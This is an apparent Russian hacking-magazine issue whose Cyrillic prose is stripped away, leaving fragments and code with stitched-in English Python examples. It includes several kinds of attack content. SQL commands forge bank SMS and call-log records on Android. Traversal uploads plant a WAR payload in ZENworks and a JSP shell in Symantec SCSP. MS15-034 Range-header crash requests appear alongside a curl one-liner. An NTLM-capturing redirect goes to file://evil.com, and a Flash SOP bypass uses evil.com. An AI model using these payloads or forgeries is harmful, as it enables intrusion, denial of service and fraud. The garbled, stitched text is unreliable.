  • , , ioctl. -, - . , - , ioctl, . ( ).

    API. , . Android , (, -, ) , - .

    , CyanogenMod, - Nexus 4. Android 4.3 CyanogenMod HardwareComposer, , .

    - , - . C ? - , . , , - . GSM- , .

    ... - . HTC One M8. Wi-Fi . -: OEM-

    Google , , - . -.

    , Nexus 4, - - . Qualcomm , .

    - , -, , ? - , - Nexus 6 . , .

    Nexus OnePlus One? ? ( , Google, Motorola Cyngn - ). , , .

    ? - , -.

    ? - ?, , Imoseyon ( leanKernel, - franco.kernel. . .) - . CodeAurora ( Qualcomm. . .) .

    FKUpdater Google Play?, FKUpdater. - , 2011 . - . FKUpdater , , .

    . . .

    FKUpdater, : Peek , Active Display Motorola.

    : , , ;

    Per-App Modes - . , , GPU , , . root - ;

    Servicely . Servicely, -, (, ). Servicely . -, ;

    Nexus Display Control , RGB . Galaxy Nexus, Nexus 4 Nexus 5. ( franco.kernel);

    Simple Reboot - (recovery, bootloader, etc.);

    Simple CPU Monitor Extension DashClock, .

    Google Play

    ,-,-


  • Andy Frith @shutterstock.com

    .

    SQLite,-Android.-db.,,.

    root


  • ,Android-. /data/data/__/databases.- () PlayMarket.

    /data/data,-,RootExplorer., ,,SQLiteDebugger(goo.gl/W4Euvp),DBBrowser for SQLite (sqlitebrowser.org). BusyBoxsqlite3.Nexus55.1. , -,- SQLite Debugger, App.-?.

    accounts.db /data/system/ /data/system/users/0 - , . accounts.db account,-.,().

    authtokens ,Google,GMS-.extras,GoogleUserId/.,Talk,YouTube,URLshortener,Wallet.

    ,,,-.. Nexus 5 - Nexus 7 ( 5.1 flash-all.bat -w, root). -,,accounts.db(WhatsApp,APK1mobile.com).,-/data/system/users/0.

    ,-Google ., ,,Google+,,GoogleDrive,-,.PlayMarket, : rpc:s-7:aec-7.,-.

    -: Viber,

    ; Facebook,-

    ; WhatsApp; ICQ,

    ; LinkedIn

    ; Pebble

    ; Dropbox; ..

    ,,-.

    :-,accounts.db.

    mmssms.db -. /data/data/com.android.providers.telephony/databases/. --.- 900 . mmssms.db,:ECMC684402.05.1512:49 450 210009 KARI : 3281.16. ,.-SQLiteDebugger.-sms.:

    > SELECT _id, thread_id, address, date, body FROM sms WHERE address = 900

    - ,.-.-(,).

    , SELECT -,,,,,UNIX time

    accounts.db

    accounts.db

    BRADA

    [email protected]


  • (. mmssms.db).-. .Update value. . - .ECMC684405.05.1510:181000000ATM367700:1003731.16.-:

    > UPDATE sms SET body = 'ECMC6844 05.05.15 10:18 1000000 ATM 367700 : 1003731.16' WHERE _id = 196

    ,- . (05.05.1510:18)date.UNIXtime-,-unixtimestamp(goo.gl/R1wv2a). 1430810300.date.

    > UPDATE sms SET date = 1430810300000 WHERE _id = 196

    , - . - Commit . , . mmssms.db , . -,,.

    .-:threads,-()/, sms, ..1. .

    sms - thread_id, -. mmssms.db, 7.,- . : thread_id/; address-; person ;date; read1 ,0; type1,2(04);body . , , :

    -

    mmssms.db

    mmssms.db


> INSERT INTO sms (thread_id, address, date, read, type, body) VALUES (7, 900, strftime('%s', 'now')*1000, 1, 1, '_')

    strftime('%s','now')*1000-.UNIXtime. .2. -

    . +7123456789, ,- (.).,- threads canonical_addresses. canonical_addresses,.

    > INSERT INTO canonical_addresses (address) SELECT '+7123456789' WHERE NOT EXISTS (SELECT 1 FROM canonical_addresses WHERE address = '+7123456789')

    / threads.recipient_ids-_id,canonical_addresses,.

    > INSERT INTO threads (message_count, recipient_ids, read) SELECT 1, MAX(_id)+1, 0 from threads

    thread_id,recipient_ids,-recipient_idsthreads1(MAX(_id)+1).

> INSERT INTO sms(thread_id, address, date, read, type, body) SELECT max(_id), '+7123456789', strftime('%s', 'now')*1000, 0, 1, '_' from threads

    -..

    ,-.Proofofconcept:

    VariableQuerry. :-

    /,/-(1/2),.

    -canonical_addresses..UNIXtime.-%Time0.

    ,.

    -ScriptRunShellRoot:

$ /system/xbin/sqlite3 /data/data/com.android.providers.telephony/databases/mmssms.db "INSERT INTO sms(thread_id, address, date, read, type, body) VALUES (7, 900, strftime('%s', 'now')*1000, 1, 1, '_')"
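As a forensic counterpart to the manual edits above, here is an added example (not from the article) that rebuilds a cut-down mmssms.db in memory, replays the article's UPDATE and INSERT steps on it, and then audits the sms, threads and canonical_addresses tables for the inconsistencies those edits leave behind. The schema subset, sample rows, acquisition time and timestamps are all constructed for the example.

```python
import sqlite3

# Cut-down replica of the three mmssms.db tables edited above, limited to the
# columns the article names. Constructed for this example: the real telephony
# provider schema has many more columns plus triggers.
SCHEMA = """
CREATE TABLE canonical_addresses (_id INTEGER PRIMARY KEY, address TEXT);
CREATE TABLE threads (_id INTEGER PRIMARY KEY, date INTEGER,
                      message_count INTEGER, recipient_ids TEXT, read INTEGER);
CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT,
                  person INTEGER, date INTEGER, read INTEGER, type INTEGER,
                  body TEXT);
"""
DAY_MS = 86_400_000  # one day in milliseconds (sms.date is UNIX time * 1000)


def build_sample_db(now_ms):
    """Constructed sample: a genuine two-message thread from short code 900,
    followed by the three kinds of manual edit shown in the article."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.execute("INSERT INTO canonical_addresses VALUES (1, '900')")
    con.execute("INSERT INTO threads VALUES (7, ?, 2, '1', 1)", (now_ms - DAY_MS,))
    con.execute("INSERT INTO sms VALUES (195, 7, '900', NULL, ?, 1, 1, 'balance 450')",
                (now_ms - 2 * DAY_MS,))
    con.execute("INSERT INTO sms VALUES (196, 7, '900', NULL, ?, 1, 1, 'balance 210009')",
                (now_ms - DAY_MS,))
    # (1) rewrite body and date of row 196; the new date predates row 195
    con.execute("UPDATE sms SET body = 'balance 1003731', date = ? WHERE _id = 196",
                (now_ms - 3 * DAY_MS,))
    # (2) append a row to thread 7 without touching threads.message_count
    con.execute("INSERT INTO sms (thread_id, address, date, read, type, body) "
                "VALUES (7, '900', ?, 1, 1, 'appended')", (now_ms,))
    # (3) new thread for a new number via the MAX(_id)+1 trick: the canonical
    #     address gets _id 2, but recipient_ids is derived from threads' MAX(_id)
    con.execute("INSERT INTO canonical_addresses (address) SELECT '+7123456789' "
                "WHERE NOT EXISTS (SELECT 1 FROM canonical_addresses "
                "WHERE address = '+7123456789')")
    con.execute("INSERT INTO threads (message_count, recipient_ids, read) "
                "SELECT 1, MAX(_id)+1, 0 FROM threads")
    con.execute("INSERT INTO sms (thread_id, address, date, read, type, body) "
                "SELECT MAX(_id), '+7123456789', ?, 0, 1, 'new thread' FROM threads",
                (now_ms + DAY_MS,))  # timestamp one day after acquisition
    con.commit()
    return con


def audit_mmssms(con, now_ms):
    """Return sorted (check, row_id) findings over sms / threads /
    canonical_addresses. These are heuristics for an acquired database, not
    proof of tampering on their own."""
    findings = set()
    cur = con.cursor()
    # sms rows whose thread does not exist
    for (sid,) in cur.execute("SELECT _id FROM sms "
                              "WHERE thread_id NOT IN (SELECT _id FROM threads)"):
        findings.add(("orphan_sms", sid))
    # threads whose recipient_ids (space-separated canonical_addresses ids) dangle
    for tid, rids in cur.execute("SELECT _id, recipient_ids FROM threads").fetchall():
        for rid in str(rids).split():
            if not cur.execute("SELECT 1 FROM canonical_addresses WHERE _id = ?",
                               (int(rid),)).fetchone():
                findings.add(("dangling_recipient", tid))
    # message_count disagreeing with the number of sms rows in the thread
    for tid, declared, actual in cur.execute(
            "SELECT t._id, t.message_count, "
            "(SELECT COUNT(*) FROM sms s WHERE s.thread_id = t._id) "
            "FROM threads t").fetchall():
        if declared != actual:
            findings.add(("message_count_mismatch", tid))
    # dates later than the time the image was taken
    for (sid,) in cur.execute("SELECT _id FROM sms WHERE date > ?", (now_ms,)):
        findings.add(("future_date", sid))
    # _id grows in insertion order, so within a thread date should not go backwards
    for (tid,) in cur.execute("SELECT _id FROM threads").fetchall():
        prev = None
        rows = cur.execute("SELECT _id, date FROM sms WHERE thread_id = ? "
                           "ORDER BY _id", (tid,)).fetchall()
        for sid, date in rows:
            if prev is not None and date < prev:
                findings.add(("date_out_of_order", sid))
            prev = date
    return sorted(findings)


if __name__ == "__main__":
    NOW_MS = 1_433_000_000_000  # constructed acquisition time (2015-05-30 UTC)
    for finding in audit_mmssms(build_sample_db(NOW_MS), NOW_MS):
        print(finding)
```

On a real image, open the copied mmssms.db with sqlite3.connect() instead of building the sample and pass the acquisition time as now_ms.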

    contacts2.db /data/data/com.android.providers.contacts/databases/.

    ,--.accounts (, facebook,vk, whatsapp, viber). , .

    , - -. , . ()62015,10:23 0 0 (. contacts2.db).

    calls , ( 364) , , -,.UNIXtime,-,2-.. (. ):

    > UPDATE calls SET date = 1430829536000, duration = 1524 WHERE _id = 364

    ,.,,,SQLite-. telephony.db,,

    ,S-..-,(com.android.telephony).

    barcode_scanner_history.db-BarcodeScanner/-(goo.gl/eWAiom).,---(com.google.zxing.client.android).

    btopp.dbBluetooth,-MAC(com.android.bluetooth).

    calendar.db(com.android.providers.calendar).

    external.db internal.db,/sdcard,:system,data(com.android.providers.media).

    google_analytics,GoogleAnalytics. keep.dbGoogleKeep.191,,

    ,Pebble,(com.google.android.keep).

    mail.db.(ru.yandex.mail). music.db,/-GooglePlayMusic(

    com.google.android.music). reminders.db,GoogleNow.

    ,GooglePlay(com.google.android.gms).

    user_dict.db().-(com.android.providers.userdictionary).

    viber_messages.db(com.viber.voip).

    threads_db2.dbcontacts_db2.db Facebook(com.facebook.katana).

    vk.db.,,.,,vk.com/idXXXX.,-(com.vkontakte.android).


  • (. contacts2.db)- , ().-.-:

> INSERT INTO calls(number, date, duration, type) VALUES ('+71234567890', strftime('%s', 'now')*1000, 89, 1)

    (.),. -

    contacts2.db

    -


  • INFO

    demosfenus SQL-

    .

    -

    WhatsApp

    ,. ( ),dialer.db.

    ,-,-, . .

    msgstore.dbWhatsApp,/data/data/com.whatsapp/databases. chat_list -,threads-. messagesdata.wa.db. , WhatsApp .messagesSQL-:

> UPDATE messages SET data = '_' WHERE _id = ___

    WhatsApp.,-.

    settings.db/data/data/com.android.providers.settings-, . -.-, -. ,.:global,systemsecure.. adb_enabledUSB. airplane_mode_radios

    ,-.

    always_finish_activities(activities),.

    usb_mass_storage_enabledUSB-.

    wifi_sleep_policyWi-Fi-().

    wifi_watchdog_on/Wi-FiWatchdog().

    bluetooth_discoverability_timeout-Bluetooth.

    end_button_behavior,.

    font_scale. setup_wizard_has_run

    /-.

    android_id ,64-(hex-),-.

    location_mode skip_first_use_hints1,-

    status_bar_show_battery_percent-.

    audio_safe_volume_state-.

    bugreport_in_power_menu-.

    ( API) developer.

    android.com(goo.gl/WTsf9v).-settingscontent.-,(si -):

$ adb shell content insert --uri content://settings/system --bind name:s:status_bar_show_battery_percent --bind value:i:1

    -c4.4+.(goo.gl/SH9zeP).,,1,0, .

    , -/ . -lockscreen.password_typelock_pattern_autolock./data/system/locksettings.db.

    ,-. -, , , . - , , ,. / , -(5.0), , ,adbpull,,- 1520. - , , , -.


  • . , -. ,, 3,74 (,Apple).

    , , , Android(iOS)- . lowend Mediatek,,---.

    Defy- . -, 1 , - (, , ), . Defy -Nexus4,,(1500- 2100 ). ,,,- NFC , -.

    , - , , - .,Feedly, , . Defy-.,Android4.0/5.0, HTML .

    , FeedMe, Java, -. ,- -,,.

    -Android-,-.,-.MotorolaDefy,,-,,-iPhone.,--,,--,20082009.

    OperaMini, , . OsmAnd(OpenStreetMap),-GhostCommander, --Twidere,.-,,-,.

    GooGle Google, , ,,--.Google- , , .

    - . - , .:GooglePlay,GmailGoogleKeep. , , , ? ,,?,-,,,-?.

    , - gapps-pico, GooglePlayGoogleServicesFramework,- Google . - . - 1Mobile Market GooglePlay,Gmail,-Gmail (,,Inbox).

    , --,., , - - Linux 2.4. KDE3, - - , KDE5,.,BeOS,- - . ,, . MeeGo Linux Nokia N900.,,,iOS. -, iPhone4, , -.,.

    ,:MotorolaDefy , - Motorola Droid II TI OMAP 3 1,2 (1),512-

    ,3,7-,-Android2.1. -,- - low low end. CyanogenMod 11 , (,Defy-,- kexec ). ,-DefyNexus4.,.

    3,74.60, , -. -, ,-(Nexus4GalaxyNexus)-.

    ,- , ,,.

    androidstreet.net


  • APK #8.

    AndroguArd Apktool (goo.gl/LdB4V7) / -, Androguard (goo.gl/bdBlRu) - . , Androguard Python-, - . Androapkinfo , androdd , androdiff , , androlyze DEX- . .

    Androguard , - , , , - . , - , - - -, , VirusTotal, Google.

    SmAlideASmalidea (goo.gl/EWmB1z) IDEA / Android Studio, - , smali. . backsmali (goo.gl/ikzOQS) APK-, - Android Studio, DEX .

    smali, -, - , , ART, Dalvik Android 5.0. - smali- , Android- .

    SimPlify , -. , - . , Simplify (goo.gl/ff0cNm) . Simplify , , - smali- , , , , , .

    , Simplify - , - / .

    , ! , . . , , . , : - , IDEA- smali- , Android- Sony Mobile. , , - .

    APKAnAlyzer Apktool Angroguard , ApkAnalyzer (goo.gl/byFUq) Sony Mobile . Java- , -- . - APK-, smali-, (, ).

    : /

    ; XML- -

    ; -

    ; logcat; ODEX ; ; (

    ELF-).

    , , , Java- JD-GUI (jd.benow.ca) APK Studio (apkstudio.codeplex.com), / APK- , Java-.

    ApkAnalyzer

    -

    Smalidea


  • Easy Hack

    GreenDog , Digital [email protected],twitter.com/antyurin

    ViewState aSP.Net , Easy Hack - Microsoft. , ASP.NET. , - OWASP top 10 (SQLi, CSRF, XSS ) , , - .

    ASP.NET ViewState. . - . - ASP.NET. , - . -

    WARNING

    - . ,

    , -

    .


  • postback. , ( URL), . ViewState. - . - ViewState , .

    ViewState Base64 - , (__VIEWSTATE).

    ViewState. -, reflected XSS. XSS Auditor - Base64, - ViewState . -, , -. , .

    ViewState, Microsoft MAC (Message Authentication Code). , , . , - Base64 . ViewState - , , , , .

    , . , MAC . - , MAC . -, . -, , . - , - -. -, - .

    , MAC, Base64 . , , MAC , , .

    Burp Proxy Response ViewState. (. ) , MAC.

    ViewState

    XXe JSON, - XXE - . XXE 2000-, ( Server Side Request Forgery). XXE - .

    XXE , XML - Document Type Definition (DTD) - (inline DTD), -. , , , libxml,

    (PHP, Python, Perl), inline DTD.

    , , - , , - .

    , NetSPI (goo.gl/ol9GAq), XXE.

    , - (web service). , - -. . ( HTML), - .

    - , - . - . . , , , , REST, SOAP, XML JSON. (endpoints) , (/webservice/json, /webservice/soap ).

    NetSPI , - - , Content-Type. - endpoint JSON, Content-Type: application/xml, XML, , XXE. -, .

    - XML, - . JSON :

    {"search":"name","value":"netspitest"}

    XML :

    namenetspitest

    - . , . Content-Type, XML


  • proof of concept, . - C dummy, .

    : , , . UAC , , , -.

    , Windows. !

    -, . -, - WebDAV SMB. , , - . , MS08-68 . , , , , , HTTP, SMB.

    -, NTLM Relay , - SYSTEM , - . , , , .

    Microsoft, , - -. SMB, - . , , .

    wiNdOwS NtLM-

    HttP SMB

    , NTLM-. , - Microsoft, , . -.

    . Windows NTLM, challenge-response:1. .2. (challenge).3. challenge ( NT-

    , ) .4. .

    , .

    , - . relay-. , , .

    , NTLMv2, , -, . , NTLM , HTTP, Telnet, POP3, FTP, SMB .

    Windows. , -. SMB HTTP. UNC- (, \\evil\test), 445- (SMB) - , evil .

    - SMB Relay. , . , , , RCE. MS08-68.

    - . - NTLM- (goo.gl/AQbSNM).

    .1. WebDAV ( HTTP)

    NTLM. 1024, , .

    2. ( NT AUTHORITY\SYSTEM) WebDAV (\\127.0.0.1:8080\test.txt).

    3. , - .

    4. .5. -! .

    $IPC ( ).

    WebDAV , SMB. WebDAV , - UNC- (\\127.0.0.1:8080\test.txt). - WebDAV Windows , (Windows 7, 8 8.1) , WebDAV. , - .

    Windows Defender. SYSTEM. Windows, , , .

    WebDAV ,

    SYSTEM

    Windows WebDAV

    NTLM- ( NTLM). white paper (goo.gl/Q1Uz5A), - - .

    NTLM- NTLM-. , , ,


  • SOP SwF FLeX SdK data="https://victim.com/badflex.swf ">

    2. , victim.com .

    3. , , victim.com, Flash, http://evil.com/sender.swf.

    4. Flash , sender.swf, ( victim.com) evil.com, crossdomain.xml.

    5. crossdomain.xml victim.com, - sender.swf.

    6. sender.swf victim.com.7. sender.swf

    victim.com . SOP , sender.swf victim.com.

    , - , CSRF .

    , , swf. ParrotNG, , Burp, SWF.

    . UNC- SMB, HTTP. , - Intranet. , , - , . , http://evil/ Intranet, http://evil.com/ Internet. , - NTLM-, ( , , ). - NTLM-, , . IP- - Internet ( ).

    . ( ), - , IE.

    - , - HTTP. , man-in-the-middle . . , -.

    . , - antivir.ru. antivir.ru NTLM-, , Internet. - http://evil/ .

    . , - SMB. HTTP , NTLM.

    :

HTTP/1.1 302 Found
Content-Type: text/html
Location: file://evil.com/ntlm_catcher

    , - API, .

    , , , , , . , , , MS . .

    Flash crossdomain.xml, , - SOP (Same-origin policy). SOP Flash. Troopers 2015 Minded Security NibbleSec (goo.gl/JRBwJ4).

    Troopers, . - SOP Flash? , Adobe , , - . , -, .

    , , Flash , crossdomain.xml . . - .

    Flex SDK, - Flash. 3.1 - (). . - flashvars (-, - ) resourceModuleURLs. , - , . . , - - , .

    , Flash, Flex SDK , -, SDK -. -, Flex SDK, .

    , , , , - Flex SDK, , 4.5.1. , , , . , - , - - , Google. , , Flex SDK.

    . , victim.com, - (badflex.swf), - Flex SDK. evil.com - - (sender.swf), victim.com, crossdomain.xml - victim.com.1. evil.com, -

    victim.com. - resourceModuleURLs. - :

  • Novell ZeNworks CVSSv2: N/A : 8 2015 : Pedro Ribeiro CVE: 2015-0779

    Novell ZENworks Configuration Management (ZCM, ZENworks Suite). UploadServlet - uid (../). WAR- Tomcat -. WAR Web Archive Web Application Archive,

    Java -. , . , - http.sys.

    , , - - Java- JAR ZIP. WAR:

/index.html
/guestbook.jsp
/images/logo.png
/WEB-INF/web.xml
/WEB-INF/classes/org/wikipedia/Util.class
/WEB-INF/classes/org/wikipedia/MainServlet.class
/WEB-INF/lib/util.jar
/META-INF/MANIFEST.MF

    EXPLOIT : WAR-, :

    dukeBarman [email protected],

    @dukebarman, dukebarman.pro


  • POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war

    Metasploit.

    msf exploit(zenworks_configuration_management_upload) > rexploit

    ZCM. , ZDI-10-078/OSVDB-63412, .

TARGETS: ZENworks Configuration Management

... 0)
    agentName = filename.substring(24, index);
else
    agentName = filename.substring(24);
String date = mFormat.format(mParser.parse(filename.substring(0, 8)));
String parentFolder = (new StringBuilder()).append(SisProperties.getBulkLogDir())
    .append(FILE_SEP).append(agentName).append(FILE_SEP).append(date).toString();
File parent = new File(parentFolder);
if (!parent.isDirectory())
    parent.delete();
parent.mkdirs();
file = new File(parentFolder, filename);
return file;
Throwable th;
th;
throw new IllegalArgumentException((new StringBuilder())
    .append("Corrupted bulk log filename [").append(filename).append("]!!").toString(), th);
}
...

    , 24- . - filename . - (), :


  • LOG_ROOT/AGENT_NAME/FORMATTED_DATE

    parent.mkdirs(). - .

    EXPLOIT . , /register, GUID,

    . YYYY-MM-DD/YYYYMMDD,

    YYYYMMDD YYYY-MM-DD . , . - .

    servlet : YYYYMMDD/../../../././././PATH_FROM_TOMCAT. - JSP-.

    ( , ) - (bit.ly/1IotJe3) . . - , :

    ...19991111est3X1999-11-11/19991111/

    .4test5test6.jsp

    :

    ...19991111/../../../././././tomcat/symapps/agent/sis-agent/jspshellS2.jsp

    . -:

req1 = """POST /sis-agent/""" + action + """ HTTP/1.1
Host: """ + host + """
Accept: */*
Appfire-Format-Version: 1.0
Content-Type: application/x-appfire
AppFire-Charset: UTF-8
AppFire-GUID: """ + guid + """
Content-Length: """ + str(len(body)) + """

    action bulk-log; guid GUID ; str(len(body)) .

    (Properties):

    headers="Data-Format=text/plain\x0aData-Type=properties\x0aData-Length=%d\x0a\x0a" % (len(properties))

    :

    "file.name":__

    JSP-

    JSP-

    :

    headers="Data-Format=binary/zip\x0aData-Type=policy\x0aData-Length=%d\x0a\x0a" % (len(bin))

    JSP- Metasploit. , jspshell.jsp. update.py.

    , , . -, SCSP , - . - - .

    - , (bit.ly/1IVLQan).

    TARGETSSymantec Critical System Protection Server

[Figure: http.sys request handling in IIS; labels: Range Length, Range, HTTP, TcpSegment; steps: 1. HTTP, 2. Range, 3. Range Tail, 4., 5.]

    , Range Length 284 0xFFFFFFFFFFFFFEE4. , .

    HTTP- UlAdjustRangesToContentSize(). Range, . -, , Range - . -.

    0xFFFFFFFFFFFFFFFF 0xFFFFFFFFFFFFFFFF >= >=

    . - Range (. ).

    284, 0xFFFFFFFFFFFFFEE4, . .

    , -. , , UxpTpDirectTransmit(), . .

    , :

Range Count = 1;
Range Boundary and Range Info length = 0;
Range Tail Boundary Length = 0;
Range Length = 0xFFFFFEE4;
HTTP Head Length = 283;

    , 0xFFFFFFFF (4G). , . , - . 284 .

HTTP Response Length = HTTP Head Length + (Range End Position - Range Start Position + 1)
                     = HTTP Head Length + (0xFFFFFFFF - Range Start Position + 1)
                     = HTTP Head Length - Range Start Position

    Range Start Position HTTP , . , HTTP Response Length HTTP Head Length.

    DoS, , HTTP Content Length . Range Start Position - HTTP Head Length + 1 . HTTP Content Length DoS-.

    HTTP- , http.sys - . TcpSegmentTcbSend() tcpip.sys . (. ).

    15 . HTTP Response Length 0xFFFFFFFF. Virtual address -


  • EXPLOIT ( ):

GET / HTTP/1.1
Host: site.com
Range: bytes=0-18446744073709551615

    - : (bit.ly/1KvJDRc); Python (bit.ly/1cjO8mC).

    :

    curl -v SERVER_IP -H "Host: anything" -H"Range: bytes=0-18446744073709551615"

    -, bash . , - :).

    ITW- - . ( ESET):

GET /%7Bwelcome.png HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: [server-ip]
Connection: Keep-Alive
Range: bytes=18-18446744073709551615

    TARGETSWindows- MS15-034.

    SOLUTION .

    7.

    PHP

    (>=0x80000000). HTTP Response Length - , . virtual address . partial memory descriptor list (MDL) (bit.ly/1zODcs4). , BSOD.

    -.

"GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3-18446744073709551615, 1-600" + "\r\n\r\n"

(Range): Range1: 3 - 18446744073709551615; Range2: 1 - 600.

    UlpParseRange() :

Range1 Length = 0xFFFFFFFFFFFFFFFF - 0x3 + 1 = 0xFFFFFFFFFFFFFFFD
Range2 Length = 600 - 1 + 1 = 600

    HTTP UlAdjustRangesToContentSize(). Range1 (3 + 0xFFFFFFFFFFFFFFFD => 0) , . Range2, , .

    , - UxpTpDirectTransmit().

Range Count = 2
Range1 Length = 0xFFFFFFFFFFFFFFFD
Range2 Length = 600
Http Head Length = 0x127                        // HTTP head content, 1
Range1 Boundary and Range1 Info length = 0x7a
Range2 Boundary and Range2 Info length = 0x69
Range Tail Boundary Length = 0x32;              // 3

    Range, (boundary) (Content-Type, Content-Range) Range ( 2).

    HTTP- , :

HTTP Response Length = HTTP Head Length + Range1 Boundary and Range Info length + Range1 Length
                     + Range2 Boundary and Range Info length + Range2 Length + Range Tail Boundary Length
                     = 0x127 + 0x7a + 0xFFFFFFFD + 0x69 + 0x258 + 0x32 => 0x491

    - 0xFFFFFFFD. - 0x491 HTTP-. .

    tcpip.sys . HTTP-. 0x491. , 0xFFFFFFFD ( 7). Length - Remain Length 0x2f0 (0x491 0x172 0x7a). : [0x3, 0x3 + 0x2f0]. - 0x2b6. .

    , . - :

"GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3-18446744073709551615,1-32,32-64,64-96,96-128,128-256,129-130,130-140,160-170,180-190,190-200" + "\r\n\r\n"

    - BSOD, - . - .
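To make the two derivations above checkable (the single-range case ending in HTTP Head Length - Range Start Position, and the two-range case that sums to 0x491), here is an added example, not from the article, that parses a Range header, computes each range's length the way the article describes UlpParseRange() doing it, re-sums the two-range response length with the 32-bit truncation of the UxpTpDirectTransmit() path, and turns that arithmetic into a detection rule for incoming requests. The head, boundary and tail lengths are the article's numbers; the header parser is a simplification that handles only plain byte-range-specs.

```python
import re

U32 = 1 << 32
U64 = 1 << 64


def parse_byte_ranges(header_value):
    """Parse a Range header value such as 'bytes=3-18446744073709551615, 1-600'
    into (start, end) pairs; a missing bound ('-500' or '500-') becomes None."""
    m = re.match(r"^\s*bytes\s*=\s*(.+?)\s*$", header_value)
    if not m:
        return []
    ranges = []
    for spec in m.group(1).split(","):
        first, sep, last = spec.strip().partition("-")
        if not sep or not (first or last):
            continue  # not a byte-range-spec; skip it
        ranges.append((int(first) if first else None, int(last) if last else None))
    return ranges


def range_length_u64(start, end):
    """Length as the article describes UlpParseRange() computing it:
    end - start + 1 in 64-bit arithmetic, so a huge end wraps around."""
    return (end - start + 1) % U64


def range_lengths_u64(ranges):
    return [range_length_u64(start, end) for start, end in ranges]


def response_length_u32(head_len, boundary_lens, range_lens, tail_len):
    """Sum the response length the way the 32-bit transmit path
    (UxpTpDirectTransmit) does: each range length is truncated to 32 bits and
    the running total wraps, so a near-4 GiB range almost vanishes from the sum."""
    total = head_len + tail_len
    for boundary_len, range_len in zip(boundary_lens, range_lens):
        total += boundary_len + (range_len % U32)
    return total % U32


def is_ms15_034_probe(header_value):
    """Detection rule for incoming requests: a byte range whose length
    end - start + 1 needs more than 32 bits, or whose end precedes its start,
    has the shape of the MS15-034 probes quoted in the article."""
    for start, end in parse_byte_ranges(header_value):
        if start is None or end is None:
            continue
        if end < start or end - start + 1 >= U32:
            return True
    return False


if __name__ == "__main__":
    ranges = parse_byte_ranges("bytes=3-18446744073709551615, 1-600")
    lens = range_lengths_u64(ranges)
    print([hex(x) for x in lens])                                     # ['0xfffffffffffffffd', '0x258']
    print(hex(response_length_u32(0x127, [0x7a, 0x69], lens, 0x32)))  # 0x491
    print(is_ms15_034_probe("bytes=18-18446744073709551615"))         # True
```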

    6. -


  • Tor:

    @difezza, defec.ru


  • ,-,.- , ,, , ,,DreadPirateRoberts.

    SilkRoad(20112013)Tor15,--.,200-.

    2013 ,, -,.- .

    - , -:,- . , , SilkRoad-.-, .

    , , 400 onion- -,-SilkRoad2.0.

    , -,-.,onion-,Tor , -, -.-,-.

    2016 - (Nick Bilton), ,, . , - ,,-.Wired(www.wired.com/2015/04/silk-road-1), -.

    Onymous, - (European Cybercrime Centre, EC3), , - (the U. S. Immigration and CustomsEnforcement,ICE),-(HomelandSecurityInvestigations,HSI)(Eurojust), 17, - ,410. : https://www.europol.europa.eu/content/global-action-against-dark-markets-tor-network.

    Silk Road

    onymouS

    Silk Road

    Onymous onion-

    Tor, -

    ,

    Silk Road

    Silk Road.

    Tor

    ?Tor?,,.,-,.,,-!?,.


  • , , -,,.

    , - Tor -.-:().

    , -? NSA ,Firefox,TorBrowser.,-NSA,-,-.

    ( , ?) , -,- . , , Flash , -.TorBrowser-,Flash-.

    , -HTML5,-, , , - . WebRTC, -HTML5,Flash IP-.STUN-, WebRTC, - Tor -.TorBrowser.

    Tor-,, , -,PoC., , ,-.

    - , -NetFlow(www.cs.columbia.edu/~sc2516/papers/pam2014-tor-nfattack.pdf). -,- NetFlow- ,Tor . NetFlow- -: ; ; ; ; ; ; ; IP; TypeofService; TCP--

    ; ; .

    ,,-,

    NSA -

    Tor

    Flash

    IP-

    Tor-

    -NSA, - Tor-, -:

    https://www.schneier.com/blog/archives/2013/10/how_the_nsa_att.html,

    www.theguardian.com/world/interactive/2013/oct/04/egotistical-giraffe-nsa-tor-document.

    nSa


  • Tor-.- -, . -Tor-,.

    , -190,-Tor.-,.

    Tor,,- , .exit--,,onion-.-onion-,HTTP/HTTPS- Tor-, -.

    , HTTP-.-Referer,URL.- , --.

    ,-onion,.-,-,.

    -,-.,.

    ,-,exit-,LeviathanSecurity.,-. - , Tor,-exit-nodeMITM--.

    - , ( ) - , .

    HTML5canvas,-JavaScript.-.-: (TorBrowser,-

    );

    -;

    -.

    ,-, JavaScript- measu-reText().

    ,-TorBrowser,, . Tor Browser , --.


  • POST--, -,,.

    ? JS- -: Exit-node.MITM-,JS-

    -,.

    onion--,.,-.

    XSS(,-)-.

    . - 100 onion- ()falsepositive,,30%--.

    , -, - . - , -JS--.,,c2c91d5b3c4fecd9109afe0esdfsdfsdfdrugs.onion(), gunsdfsdf.onion ( ),linkedin.com/vasya.:.

    ?-,onion-. , : JavaScript? , TorBrowser,JS.

    , --.

    - : - ( , - ), ( IT-). (ContentDeliveryNetwork,CDN),-128Tor-(CDN,).

    , JavaScript,measureText()--.

    -. -.


[Diagram; labels: ONION, EXIT NODE, XSS, DOORWAY, INJECT, WWW]

  • ,-EMC-RSAConference2015,--CheckPoint.-,--,.-,:-,--.

    RSA ConfeRenCe

    IT-

    2015


  • - , , , -

    ,. ,, . , - ? -???, 20 Moscone center,-, -RSA Conference 2015, -,--.

    , - ,-.- -. - .-:, ( ,,-),,,.

    ,--. , -. - RSA, - ,,,, , ,,,-.

    . Microsoft , , ,

    ,,,--,,-..

    , , -.(-),-,, . - -.-,:-...

    ( !) (-).

    - . - , Symantec TrendMicro Cisco Fortinet (-, - ), , , ,-.,,-.

    (keynotes,,,, ),-. ( ), ( ) - --. -, (!),-.:,-,.

    [email protected]


  • 1.Dr.APT, ( Android), ( CAIQ,),-,.,-keynotes., -.

    ,-NFC (GoogleWalletApplePay)--,,:-.

    :goo.gl/yf1TXL

    ,.62!- : 48% --,40%. , -(!). Improperly Validated SSL -,.,-, ,.

    :goo.gl/ft1e3L

    ,2014,(-?:https://xakep.ru/2015/04/09/195-exploit-packs/), . MS Office ,CVE-2012-0158!

    :goo.gl/1Nb6lN

    -Yes,IaminRU, , . , (517) , .,,,() , - . (), ,,,-,-:,, , -.,-,.-, - BBS. ,BBS-, . (--),,-,65%814.

    !


  • SAPASE,? SQL/RPC- .-Java.

    :goo.gl/b5eDZu

